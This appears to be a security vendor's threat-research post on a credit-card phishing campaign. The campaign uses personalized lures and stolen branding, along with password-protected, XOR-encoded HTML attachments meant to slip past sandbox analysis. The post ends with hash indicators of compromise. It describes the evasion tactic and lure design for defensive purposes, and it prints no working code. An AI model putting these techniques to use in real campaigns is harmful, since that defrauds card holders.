Overview
Recently, Proofpoint researchers have observed a number of email campaigns with attached password-protected malicious documents. These documents are primarily used to distribute malware including Cerber ransomware and the Ursnif banking Trojan, with document passwords included in the body of the email. The use of password-protected documents makes them difficult to execute in automated sandbox environments, circumventing a variety of anti-malware products. At the same time, including the password in the email makes it easy for recipients to open the document while password protection adds a sense of legitimacy.
Last week, however, we observed a phishing campaign using this technique designed to harvest credit card account numbers and personal information from account holders.
Analysis
The email sample that we analyzed was personalized with the recipient's name and what appear to be the starting digits of their credit card account number. The starting digits for credit cards are standardized, though, so this just adds to the apparent legitimacy of the carefully crafted emails without requiring actual knowledge of the recipient's' card number. The emails also use stolen branding and social engineering to create a sense of urgency encouraging the recipient to update security information for their "new chip card" (Figure 1).
Figure 1: Personalized phishing email with HTML attachment
The email includes an HTML attachment that is protected by a password included in the email. The HTML attachment is also XOR-encoded, again making dynamic analysis more difficult. The encoded email is shown in Figure 2:
Figure 2: XOR-encoded HTML file attached to lure email (split for screen wrap)
While the password-protected Microsoft Word documents we normally see in malware campaigns make use of Word’s built-in functionality to add passwords, this is an HTML attachment, so instead uses JavaScript to implement the password protection. The script pah.js (Figure 3) decrypts the XOR-encoded HTML when the user enters the password provided in the body of the email (Figure 4).
Figure 3: Comment on pah.js JavaScript file that accepts a password and decodes the attached HTML file
Figure 4: Password prompt generated when the recipient opens the attached HTML file
If the user enters the password correctly, they will be presented with a fairly typical credit card phishing template, complete with stolen branding (redacted - Figure 5):
Figure 5: HTML phishing template after successful decoding (split for screen wrap)
The form will submit the credentials in the same manner as we see in typical credential phishing, via HTTP POST.
Figure 6: Code snippet from HTML file featuring POST method for submitting phished information
Conclusion
Credential and credit card phishing are nearly as old as cybercrime itself. This hasn't stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password protected document attachments to bypass anti-malware technologies and give recipients a false sense of security. The bottom line for end users though is that the appearance of legitimacy, even including personalization and convincing branding, does not equal safety online.
Indicators of Compromise (IOCs)
IOC |
IOC Type |
Description |
e5bbbcea49bf6ba0de0b7d614001be29 |
MD5 |
Email sample |
d0357e7a96189f0f25099fc84a650fa9546184c5f9263ef06b449b7d02c4f692 |
SHA256 |
Email sample |
3b01a61c484e7148df640b55f54240e3
|
MD5 |
HTML Attachment |
6ee9d70f02bf71df64a06324d2d5cd32875dc0ab0ef2c7a8abd566f8654a8432
|
SHA256 |
HTML attachment |